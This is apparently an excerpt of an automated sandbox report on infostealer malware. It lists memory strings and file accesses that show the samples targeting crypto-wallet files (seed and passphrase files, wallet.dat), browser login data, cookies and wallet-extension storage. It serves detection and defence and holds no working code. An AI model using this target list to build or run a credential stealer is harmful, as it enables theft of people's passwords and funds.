Source: pisos23.exe, 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: info.seco
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000D7E000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: passphrase.json
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 3e169c0a7e.exe	String found in binary or memory: Wallets/Exodus
Source: pisos23.exe, 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000D7E000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: file__0.localstorage
Source: 3e169c0a7e.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: MultiDoge
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: seed.seco
Source: 3e169c0a7e.exe	String found in binary or memory: keystore
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 3e169c0a7e.exe, 0000000F.00000003.3040960830.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live/y

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
